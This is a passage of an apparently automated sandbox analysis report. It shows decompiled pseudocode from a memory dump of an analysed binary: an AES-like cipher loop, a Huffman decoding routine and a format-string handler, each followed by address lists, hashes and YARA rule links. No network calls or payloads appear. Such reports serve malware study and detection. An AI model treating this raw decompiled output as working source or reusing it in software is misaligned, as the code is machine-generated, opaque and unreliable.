							_t363 =  *(_t432 + 0x68) ^  *(0x235750 + (_t348 & 0x000000ff) * 4);
							 *(_t432 + 0x68) = _t363;
							 *(_t432 + 0x34) = _t363;
							_t403 =  *(_t432 + 0x48);
							_t368 =  *(0x235750 + (_t402 & 0x000000ff) * 4) ^  *(0x235350 + (_t403 & 0x000000ff) * 4) ^  *(0x235f50 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0x235b50 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
							 *(_t432 + 0x70) = _t368;
							 *(_t432 + 0x38) = _t368;
							_t404 =  *(_t432 + 0x4c);
							 *(_t432 + 0x10) =  *(0x235b50 + ( *(_t432 + 0x46) & 0x000000ff) * 4) ^  *(0x235750 + (_t403 & 0x000000ff) * 4);
							_t372 =  *(_t432 + 0x10) ^  *(0x235350 + (_t404 & 0x000000ff) * 4) ^  *(0x235f50 + ( *(_t432 + 0x53) & 0x000000ff) * 4);
							 *(_t432 + 0x10) = _t372;
							 *(_t432 + 0x3c) = _t372;
							 *(_t432 + 0x14) =  *(0x235f50 + ( *(_t432 + 0x47) & 0x000000ff) * 4) ^  *(0x235b50 + ( *(_t432 + 0x4a) & 0x000000ff) * 4);
							_t376 =  *(_t432 + 0x14) ^  *(0x235750 + (_t404 & 0x000000ff) * 4) ^  *(0x235350 + (_t348 & 0x000000ff) * 4);
							_t422 = _t421 - 1;
							 *(_t432 + 0x14) = _t376;
							 *(_t432 + 0x40) = _t376;
							if(_t422 <= 1) {
								goto L9;
							}
							_t416 =  *(_t432 + 0x68);
							_t309 = (_t422 + 2 << 4) + _t429;
							 *(_t432 + 0x14) = _t309;
							_t430 = _t309;
							 *((intOrPtr*)(_t432 + 0x18)) = _t422 - 1;
							do {
								_t411 =  *_t430;
								 *(_t432 + 0x68) =  *(_t430 - 8) ^ _t416;
								_t430 = _t430 - 0x10;
								_t313 = _t430[5] ^ _t376;
								_t412 = _t411 ^  *(_t432 + 0x10);
								 *(_t432 + 0x14) = _t313;
								_t356 = _t430[3] ^  *(_t432 + 0x70);
								_t416 =  *(0x235750 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x235b50 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x235f50 + (_t356 >> 0x18) * 4) ^  *(0x235350 + ( *(_t432 + 0x68) & 0x000000ff) * 4);
								 *(_t432 + 0x34) = _t416;
								 *(_t432 + 0x70) =  *(0x235b50 + ( *(_t432 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x235f50 + (_t412 >> 0x18) * 4);
								_t388 =  *(_t432 + 0x70) ^  *(0x235750 + ( *(_t432 + 0x68) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x235350 + (_t356 & 0x000000ff) * 4);
								 *(_t432 + 0x70) = _t388;
								 *(_t432 + 0x38) = _t388;
								_t394 =  *(0x235f50 + ( *(_t432 + 0x14) >> 0x18) * 4) ^  *(0x235750 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x235b50 + ( *(_t432 + 0x68) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x235350 + (_t412 & 0x000000ff) * 4);
								 *(_t432 + 0x10) = _t394;
								 *(_t432 + 0x3c) = _t394;
								_t376 =  *(0x235750 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x235b50 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x235f50 + ( *(_t432 + 0x68) >> 0x18) * 4) ^  *(0x235350 + ( *(_t432 + 0x14) & 0x000000ff) * 4);
								_t135 = _t432 + 0x18;
								 *_t135 =  *((intOrPtr*)(_t432 + 0x18)) - 1;
								 *(_t432 + 0x40) = _t376;
							} while ( *_t135 != 0);
							_t429 =  *((intOrPtr*)(_t432 + 0x24));
							 *(_t432 + 0x68) = _t416;
							_t415 =  *(_t432 + 0x6c);
							 *(_t432 + 0x14) = _t376;
							L9:
							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x68);
							 *(_t432 + 0x6c) = _t253;
							 *(_t432 + 0x44) = _t253;
							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x14);
							 *(_t432 + 0x34) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0x234230));
							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x10);
							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x70);
							 *((char*)(_t432 + 0x35)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0x234230));
							_t423 =  *(_t432 + 0x6c);
							 *(_t432 + 0x4c) = _t406;
							 *(_t432 + 0x48) = _t350;
							 *((char*)(_t432 + 0x36)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0x234230));
							 *(_t432 + 0x50) = _t378;
							 *((char*)(_t432 + 0x37)) =  *((intOrPtr*)((_t350 >> 0x18) + 0x234230));
							 *(_t432 + 0x38) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0x234230));
							 *((char*)(_t432 + 0x39)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0x234230));
							 *((char*)(_t432 + 0x3a)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0x234230));
							_t170 = (_t406 >> 0x18) + 0x234230; // 0x54cbe9de
							 *((char*)(_t432 + 0x3b)) =  *_t170;
							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0x234230));
							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0x234230));
							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0x234230));
							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t378 >> 0x18) + 0x234230));
							 *(_t432 + 0x40) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0x234230));
							_t409 =  *(_t432 + 0x34) ^  *(_t429 + 0x18);
							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0x234230));
							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0x234230));
							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t423 >> 0x18) + 0x234230));
							_t301 =  *(_t432 + 0x40) ^  *(_t429 + 0x24);
							_t426 =  *(_t432 + 0x38) ^  *(_t429 + 0x1c);
							_t353 =  *(_t432 + 0x3c) ^  *(_t429 + 0x20);
							 *(_t432 + 0x6c) = _t301;
							if( *((char*)(_t429 + 1)) != 0) {
								_t409 = _t409 ^  *(_t432 + 0x54);
								_t426 = _t426 ^  *(_t432 + 0x58);
								_t353 = _t353 ^  *(_t432 + 0x5c);
								 *(_t432 + 0x6c) = _t301 ^  *(_t432 + 0x60);
							}
							 *(_t432 + 0x54) =  *( *(_t432 + 0x28));
							_t304 =  *(_t432 + 0x1c);
							 *(_t432 + 0x58) =  *(_t304 - 4);
							 *(_t432 + 0x5c) =  *_t304;
							 *(_t432 + 0x60) = _t304[1];
							_t382 =  *(_t432 + 0x20);
							 *(_t432 + 0x1c) =  &(_t304[4]);
							 *(_t382 - 8) = _t409;
							_t382[1] =  *(_t432 + 0x6c);
							_t400 =  *((intOrPtr*)(_t432 + 0x2c));
							 *(_t382 - 4) = _t426;
							 *_t382 = _t353;
							_t359 =  &(_t382[4]);
							_t415 = _t415 - 1;
							 *(_t432 + 0x20) = _t359;
							 *(_t432 + 0x6c) = _t415;
						} while (_t415 != 0);
						goto L13;
					}
					return E001FE3D4(__ecx,  *((intOrPtr*)(_t431 + 0x68)), _t415,  *((intOrPtr*)(_t431 + 0x68)));
				}
				return _t222;
			}











































          0x001fdf17
          0x001fdf1b
          0x001fdf1d
          0x001fdf23
          0x001fdf29
          0x001fdf30
          0x001fdf34
          0x001fdf4f
          0x001fdf58
          0x001fdf5d
          0x001fdf62
          0x001fe3b9
          0x00000000
          0x001fe3c9
          0x001fdf68
          0x001fdf71
          0x001fdf75
          0x001fdf79
          0x001fdf7b
          0x001fdf7f
          0x001fdf82
          0x001fdf86
          0x001fdf86
          0x001fdf96
          0x001fdfa3
          0x001fdfa8
          0x001fdfce
          0x001fdfd2
          0x001fdfdd
          0x001fdfe4
          0x001fdfe8
          0x001fdfef
          0x001fe015
          0x001fe021
          0x001fe025
          0x001fe033
          0x001fe03e
          0x001fe055
          0x001fe061
          0x001fe065
          0x001fe07c
          0x001fe091
          0x001fe098
          0x001fe099
          0x001fe09d
          0x001fe0a4
          0x00000000
          0x00000000
          0x001fe0aa
          0x001fe0b4
          0x001fe0b7
          0x001fe0bb
          0x001fe0bd
          0x001fe0c1
          0x001fe0c6
          0x001fe0c9
          0x001fe0cd
          0x001fe0d3
          0x001fe0d5
          0x001fe0d9
          0x001fe0e8
          0x001fe118
          0x001fe129
          0x001fe13b
          0x001fe157
          0x001fe160
          0x001fe164
          0x001fe19d
          0x001fe1a4
          0x001fe1a8
          0x001fe1d5
          0x001fe1dc
          0x001fe1dc
          0x001fe1e1
          0x001fe1e1
          0x001fe1eb
          0x001fe1ef
          0x001fe1f3
          0x001fe1f7
          0x001fe1fb
          0x001fe1fe
          0x001fe202
          0x001fe206
          0x001fe210
          0x001fe21d
          0x001fe229
          0x001fe230
          0x001fe23a
          0x001fe246
          0x001fe24a
          0x001fe24e
          0x001fe258
          0x001fe261
          0x001fe26b
          0x001fe278
          0x001fe28a
          0x001fe29c
          0x001fe2a5
          0x001fe2ab
          0x001fe2bb
          0x001fe2d0
          0x001fe2e5
          0x001fe2f4
          0x001fe301
          0x001fe30c
          0x001fe315
          0x001fe322
          0x001fe32c
          0x001fe33c
          0x001fe33f
          0x001fe342
          0x001fe349
          0x001fe34d
          0x001fe34f
          0x001fe353
          0x001fe357
          0x001fe35f
          0x001fe35f
          0x001fe369
          0x001fe36d
          0x001fe374
          0x001fe37a
          0x001fe384
          0x001fe388
          0x001fe38c
          0x001fe390
          0x001fe397
          0x001fe39a
          0x001fe39e
          0x001fe3a1
          0x001fe3a3
          0x001fe3a6
          0x001fe3a9
          0x001fe3ad
          0x001fe3ad
          0x00000000
          0x001fe3b8
          0x00000000
          0x001fdf3f
          0x001fe3d1

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 80b29d6e87d6c6c004d7e55adce4c0feac7c592af2012ebca37af43d25121c17
          • Instruction ID: e02c476ac5ad75be55a9b1bc1c6fc0e9c47f925eb7507651da52c197fe8a57bf
          • Opcode Fuzzy Hash: 80b29d6e87d6c6c004d7e55adce4c0feac7c592af2012ebca37af43d25121c17
          • Instruction Fuzzy Hash: E6E137755183948FC304CF29E89486BBBF0BB9A301F89099EF9D997352C335E915CB62
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020364E, Relevance: .3, Instructions: 263COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 78%
          			E0020364E(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t88;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				intOrPtr _t116;
				signed int _t127;
				void* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t148;
				signed int _t150;
				void* _t152;
				signed int _t155;
				signed int _t156;
				intOrPtr* _t157;
				intOrPtr* _t166;
				signed int _t169;
				void* _t170;
				signed int _t173;
				void* _t178;
				unsigned int _t180;
				signed int _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t192;
				signed int _t198;
				void* _t201;

				_t178 = __edx;
				_t185 = __ecx;
				_t184 = __ecx + 4;
				if( *_t184 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
					L2:
					E001FA4D1(_t184,  ~( *(_t185 + 8)) & 0x00000007);
					_t82 = E001FA4E8(_t184);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t137 = 0;
						 *((intOrPtr*)(_t185 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E0020E920(_t184, _t185 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E001FA4D1(_t184, 2);
						do {
							 *(_t201 + 0x14) = E001FA4E8(_t184) >> 0x0000000c & 0x000000ff;
							E001FA4D1(_t184, 4);
							_t88 =  *(_t201 + 0x10);
							__eflags = _t88 - 0xf;
							if(_t88 != 0xf) {
								 *(_t201 + _t137 + 0x14) = _t88;
								goto L15;
							}
							_t187 = E001FA4E8(_t184) >> 0x0000000c & 0x000000ff;
							E001FA4D1(_t184, 4);
							__eflags = _t187;
							if(_t187 != 0) {
								_t188 = _t187 + 2;
								__eflags = _t188;
								while(1) {
									_t188 = _t188 - 1;
									__eflags = _t137 - 0x14;
									if(_t137 >= 0x14) {
										break;
									}
									 *(_t201 + _t137 + 0x14) = 0;
									_t137 = _t137 + 1;
									__eflags = _t188;
									if(_t188 != 0) {
										continue;
									}
									break;
								}
								_t137 = _t137 - 1;
								goto L15;
							}
							 *(_t201 + _t137 + 0x14) = 0xf;
							L15:
							_t137 = _t137 + 1;
							__eflags = _t137 - 0x14;
						} while (_t137 < 0x14);
						_push(0x14);
						_t189 = _t185 + 0x3c50;
						_push(_t189);
						_push(_t201 + 0x1c);
						E00202C88();
						_t138 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84)) - 5;
							if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84)) - 5) {
								L19:
								_t93 = E001FA4ED(_t184);
								_t94 =  *(_t189 + 0x84);
								_t180 = _t93 & 0x0000fffe;
								__eflags = _t180 -  *((intOrPtr*)(_t189 + 4 + _t94 * 4));
								if(_t180 >=  *((intOrPtr*)(_t189 + 4 + _t94 * 4))) {
									_t148 = 0xf;
									_t95 = _t94 + 1;
									 *(_t201 + 0x10) = _t148;
									__eflags = _t95 - _t148;
									if(_t95 >= _t148) {
										L27:
										_t150 =  *(_t184 + 4) +  *(_t201 + 0x10);
										 *_t184 =  *_t184 + (_t150 >> 3);
										_t98 =  *(_t201 + 0x10);
										 *(_t184 + 4) = _t150 & 0x00000007;
										_t152 = 0x10;
										_t155 =  *((intOrPtr*)(_t189 + 0x44 + _t98 * 4)) + (_t180 -  *((intOrPtr*)(_t189 + _t98 * 4)) >> _t152 - _t98);
										__eflags = _t155 -  *_t189;
										asm("sbb eax, eax");
										_t99 = _t98 & _t155;
										__eflags = _t99;
										_t156 =  *(_t189 + 0xc88 + _t99 * 2) & 0x0000ffff;
										L28:
										__eflags = _t156 - 0x10;
										if(_t156 >= 0x10) {
											__eflags = _t156 - 0x12;
											if(__eflags >= 0) {
												_t157 = _t184;
												if(__eflags != 0) {
													_t192 = (E001FA4E8(_t157) >> 9) + 0xb;
													__eflags = _t192;
													_push(7);
												} else {
													_t192 = (E001FA4E8(_t157) >> 0xd) + 3;
													_push(3);
												}
												E001FA4D1(_t184);
												while(1) {
													_t192 = _t192 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) = 0;
													_t138 = _t138 + 1;
													__eflags = _t192;
													if(_t192 != 0) {
														continue;
													}
													L44:
													_t189 = _t185 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t156 - 0x10;
											_t166 = _t184;
											if(_t156 != 0x10) {
												_t198 = (E001FA4E8(_t166) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E001FA4E8(_t166) >> 0xd) + 3;
												_push(3);
											}
											E001FA4D1(_t184);
											__eflags = _t138;
											if(_t138 == 0) {
												L47:
												_t116 = 0;
												L49:
												return _t116;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t201 + _t138 + 0x27));
													_t138 = _t138 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t138 + _t185 + 0xe4c8)) + _t156 & 0x0000000f;
										_t138 = _t138 + 1;
										goto L45;
									}
									_t169 = 4 + _t95 * 4 + _t189;
									__eflags = _t169;
									while(1) {
										__eflags = _t180 -  *_t169;
										if(_t180 <  *_t169) {
											break;
										}
										_t95 = _t95 + 1;
										_t169 = _t169 + 4;
										__eflags = _t95 - 0xf;
										if(_t95 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t95;
									goto L27;
								}
								_t170 = 0x10;
								_t183 = _t180 >> _t170 - _t94;
								_t173 = ( *(_t183 + _t189 + 0x88) & 0x000000ff) +  *(_t184 + 4);
								 *_t184 =  *_t184 + (_t173 >> 3);
								 *(_t184 + 4) = _t173 & 0x00000007;
								_t156 =  *(_t189 + 0x488 + _t183 * 2) & 0x0000ffff;
								goto L28;
							}
							_t127 = E00204393(_t185);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t138 - 0x194;
						} while (_t138 < 0x194);
						L46:
						 *((char*)(_t185 + 0xe661)) = 1;
						__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84));
						if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84))) {
							_push(0x12b);
							_push(_t185 + 0xa0);
							_push(_t201 + 0x30);
							E00202C88();
							_push(0x3c);
							_push(_t185 + 0xf8c);
							_push(_t201 + 0x15b);
							E00202C88();
							_push(0x11);
							_push(_t185 + 0x1e78);
							_push(_t201 + 0x197);
							E00202C88();
							_push(0x1c);
							_push(_t185 + 0x2d64);
							_push(_t201 + 0x1a8);
							E00202C88();
							E0020EA80(_t185 + 0xe4c8, _t201 + 0x2c, 0x194);
							_t116 = 1;
							goto L49;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t185 + 0xe65c)) = 1;
					_push(_t185 + 0xe4c4);
					_push(_t185);
					return E00202435(_t185 + 0x98d8, _t178, _t205);
				}
				_t135 = E00204393(__ecx);
				if(_t135 != 0) {
					goto L2;
				}
				return _t135;
			}





































          0x0020364e
          0x00203655
          0x0020365e
          0x00203666
          0x00203675
          0x00203680
          0x00203687
          0x0020368c
          0x00203691
          0x002036b6
          0x002036b8
          0x002036be
          0x002036c4
          0x002036ca
          0x002036cf
          0x002036de
          0x002036e3
          0x002036e3
          0x002036ea
          0x002036f0
          0x00203701
          0x00203705
          0x0020370a
          0x0020370e
          0x00203711
          0x0020374a
          0x00000000
          0x0020374a
          0x00203721
          0x00203724
          0x00203729
          0x0020372b
          0x00203734
          0x00203734
          0x00203737
          0x00203737
          0x00203738
          0x0020373b
          0x00000000
          0x00000000
          0x0020373d
          0x00203742
          0x00203743
          0x00203745
          0x00000000
          0x00000000
          0x00000000
          0x00203745
          0x00203747
          0x00000000
          0x00203747
          0x0020372d
          0x0020374e
          0x0020374e
          0x0020374f
          0x0020374f
          0x00203754
          0x00203756
          0x0020375e
          0x00203763
          0x00203764
          0x00203769
          0x00203769
          0x0020376b
          0x00203774
          0x00203776
          0x00203787
          0x00203789
          0x00203790
          0x00203796
          0x0020379c
          0x002037a0
          0x002037cd
          0x002037ce
          0x002037cf
          0x002037d3
          0x002037d5
          0x002037f3
          0x002037f6
          0x00203802
          0x00203804
          0x00203808
          0x0020380d
          0x0020381a
          0x0020381c
          0x0020381f
          0x00203821
          0x00203821
          0x00203823
          0x0020382b
          0x0020382b
          0x0020382e
          0x00203845
          0x00203848
          0x00203894
          0x00203896
          0x002038b3
          0x002038b3
          0x002038b6
          0x00203898
          0x002038a2
          0x002038a5
          0x002038a5
          0x002038ba
          0x002038bf
          0x002038bf
          0x002038c0
          0x002038c6
          0x00000000
          0x00000000
          0x002038c8
          0x002038cd
          0x002038ce
          0x002038d0
          0x00000000
          0x00000000
          0x002038d2
          0x002038d2
          0x00000000
          0x002038d2
          0x00000000
          0x002038bf
          0x0020384a
          0x0020384d
          0x0020384f
          0x0020386c
          0x0020386c
          0x0020386f
          0x00203851
          0x0020385b
          0x0020385e
          0x0020385e
          0x00203873
          0x00203878
          0x0020387a
          0x002038f5
          0x002038f5
          0x00203974
          0x00000000
          0x0020387c
          0x0020387c
          0x0020387c
          0x0020387d
          0x00203883
          0x00000000
          0x00000000
          0x00203889
          0x0020388d
          0x0020388e
          0x00203890
          0x00000000
          0x00000000
          0x00000000
          0x00203892
          0x00000000
          0x0020387c
          0x0020387a
          0x0020383b
          0x0020383f
          0x00000000
          0x0020383f
          0x002037de
          0x002037de
          0x002037e0
          0x002037e0
          0x002037e2
          0x00000000
          0x00000000
          0x002037e4
          0x002037e5
          0x002037e8
          0x002037eb
          0x00000000
          0x00000000
          0x00000000
          0x002037ed
          0x002037ef
          0x00000000
          0x002037ef
          0x002037a4
          0x002037a7
          0x002037b1
          0x002037b9
          0x002037be
          0x002037c1
          0x00000000
          0x002037c1
          0x0020377a
          0x0020377f
          0x00203781
          0x00000000
          0x00000000
          0x00000000
          0x002038d8
          0x002038d8
          0x002038d8
          0x002038e4
          0x002038e6
          0x002038ed
          0x002038f3
          0x002038f9
          0x00203906
          0x0020390b
          0x0020390c
          0x00203911
          0x0020391b
          0x00203923
          0x00203924
          0x00203929
          0x00203933
          0x0020393b
          0x0020393c
          0x00203941
          0x0020394b
          0x00203953
          0x00203954
          0x0020396a
          0x00203972
          0x00000000
          0x00203972
          0x00000000
          0x002038f3
          0x00203699
          0x002036a3
          0x002036a4
          0x00000000
          0x002036ab
          0x00203668
          0x0020366f
          0x00000000
          0x00000000
          0x0020397e

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
          • Instruction ID: 27d2ec65e037bac7dfdfe4196e8e3e722c4bcfede76fdf5b03a5edff839451fb
          • Opcode Fuzzy Hash: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
          • Instruction Fuzzy Hash: 389136F021434A8BDB24EF68C895BBEB3DDAF50300F54492DE696872C3DBB4A664C751
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00213EE9, Relevance: .2, Instructions: 237COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 86%
          			E00213EE9(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed int _t57;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int* _t103;
				void* _t105;
				signed int _t111;
				unsigned int _t113;
				signed char _t115;
				void* _t123;
				unsigned int _t124;
				void* _t125;
				signed int _t126;
				short _t127;
				void* _t130;
				void* _t132;
				void* _t134;
				signed int _t135;
				void* _t136;
				void* _t138;
				void* _t139;

				_t125 = __edi;
				_t52 =  *0x22d668; // 0x4319796a
				_v8 = _t52 ^ _t135;
				_t134 = __ecx;
				_t102 = 0;
				_t123 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t105 = 0x58;
				_t138 = _t54 - 0x64;
				if(_t138 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E0021491B(_t134);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t134 + 0x30)) - _t102;
								if( *((intOrPtr*)(_t134 + 0x30)) != _t102) {
									L71:
									_t57 = 1;
									L72:
									return E0020E203(_t57, _v8 ^ _t135);
								}
								_t124 =  *(_t134 + 0x20);
								_push(_t125);
								_v16 = _t102;
								_t60 = _t124 >> 4;
								_v12 = _t102;
								_t126 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t111 =  *(_t134 + 0x32) & 0x0000ffff;
									__eflags = _t111 - 0x78;
									if(_t111 == 0x78) {
										L48:
										_t62 = _t124 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t111 - 0x61;
											if(_t111 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t127 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t135 + _t102 * 2 - 0xc)) = _t127;
													__eflags = _t111 - _t65;
													if(_t111 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t135 + _t102 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t102 = _t102 + 2;
														__eflags = _t102;
														L62:
														_t130 =  *((intOrPtr*)(_t134 + 0x24)) -  *((intOrPtr*)(_t134 + 0x38)) - _t102;
														__eflags = _t124 & 0x0000000c;
														if((_t124 & 0x0000000c) == 0) {
															E002131B0(_t134 + 0x448, 0x20, _t130, _t134 + 0x18);
															_t136 = _t136 + 0x10;
														}
														E00214C36(_t134 + 0x448,  &_v16, _t102, _t134 + 0x18,  *((intOrPtr*)(_t134 + 0xc)));
														_t113 =  *(_t134 + 0x20);
														_t103 = _t134 + 0x18;
														_t75 = _t113 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t115 = _t113 >> 2;
															__eflags = _t115 & 0x00000001;
															if((_t115 & 0x00000001) == 0) {
																E002131B0(_t134 + 0x448, 0x30, _t130, _t103);
																_t136 = _t136 + 0x10;
															}
														}
														E00214B18(_t134, 0);
														__eflags =  *_t103;
														if( *_t103 >= 0) {
															_t78 =  *(_t134 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E002131B0(_t134 + 0x448, 0x20, _t130, _t103);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t111 - _t86;
													if(_t111 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t132 = 0x41;
											__eflags = _t111 - _t132;
											if(_t111 == _t132) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t111 - _t88;
									if(_t111 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t124 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t124;
									if((1 & _t124) == 0) {
										_t92 = _t124 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t126;
										L45:
										_t102 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							_t57 = 0;
							goto L72;
						}
						_t95 = _t55;
						__eflags = _t95;
						if(__eflags == 0) {
							L28:
							_push(_t102);
							_push(0xa);
							L29:
							_t56 = E002146B3(_t134, _t125, __eflags);
							goto L10;
						}
						__eflags = _t95 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00214890(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00214419(_t102, _t134);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t134 + 0x20;
						 *_t3 =  *(_t134 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E002147FD(__ecx, _t123);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00214871(__ecx);
					goto L10;
				}
				if(_t138 == 0) {
					goto L27;
				}
